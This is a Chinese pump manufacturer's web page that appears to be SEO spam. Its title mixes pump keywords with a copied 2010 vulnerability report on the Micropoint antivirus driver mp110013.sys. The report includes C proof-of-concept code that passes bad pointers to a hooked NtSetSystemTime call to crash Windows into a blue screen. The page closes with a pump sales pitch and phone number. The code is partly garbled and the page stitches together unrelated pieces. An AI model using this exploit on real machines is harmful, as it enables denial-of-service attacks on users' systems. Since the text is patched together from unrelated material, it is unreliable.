磁力驱动泵浦-上海龙亚泵业与您共同探讨磁力驱动泵的性能参数、价格行情!
  • 磁力驱动泵
  • 磁力驱动泵
当前位置: 主页 > 不锈钢磁力驱动泵 >

不锈钢磁力驱动泵厂微点主防2.0驱动溢出漏洞导致拒绝服务

时间:2011-12-10 14:38来源:龙亚磁力驱动泵厂 作者:上海龙亚磁力驱动泵 点击:
>漏洞标题: 微点主动防御mp110013.sys>>相关厂商: 微点>>漏洞作者: 路人甲>>提交时间: 2010-08-30>>公开时间: 2010-08-30>>漏洞类型: 拒绝服务>>危害等级: 低>>自评Rank: 5>>漏洞状态

>漏洞标题: 微点主动防御mp110013.sys>>相关厂商: 微点>>漏洞作者: 路人甲>>提交时间: 2010-08-30>>公开时间: 2010-08-30>>漏洞类型: 拒绝服务>>危害等级: 低>>自评Rank: 5>>漏洞状态: 未联系到厂商或厂商踊跃忽略>>漏洞来源: >>简要描述:>>微点主动防御mp110013.sys中存在一处本地内核拒绝服务漏洞,安装了微点主动防御的系统上,任意权限的用户可以引发系统蓝屏崩溃>>详细说明:>>微点主动防御mp110013.sys 挂钩了 NtSetSystTime->测试软件版本:1.2.10581.0296>>测试驱动程序版本:1.3.10125.0 mp110013.sys>>漏洞证明:>>哄骗代码,安装微点的机器上执行此代码,系统立即崩溃>>// fuckmp.cpp : Defines the entry point for the console application.>>//>>#include "stdafx.h">>#include "windows.h">>int main(int argc, char* argv[])>>{>>PVOID p = GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtSetSystTime");>>ULONG i ;>>for (i = 0x1000 ; i <0x7fff0000 i="0x1000)>>{>>if (IsBadReadPtr((PVOID)i , 1))>>{>>break ;>>}>>}>>__asm>>{>>push i>>push i>>call p>>}>>return 0;>>}>>修复方案:>>不仅要在probe时使用SEH,在访问参数时也要使用SEH>>厂商回应:>>未能联系到厂商或厂商踊跃拒绝>尊敬的用户您好:上海品牌不锈钢磁力驱动泵厂家,请找上海龙亚不锈钢磁力驱动泵厂,如需选型报价的客户请致电O2l-6l557O88 或 O21-61557O88 (*^__^*) 嘻嘻……。

(责任编辑:上海龙亚磁力驱动泵)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情: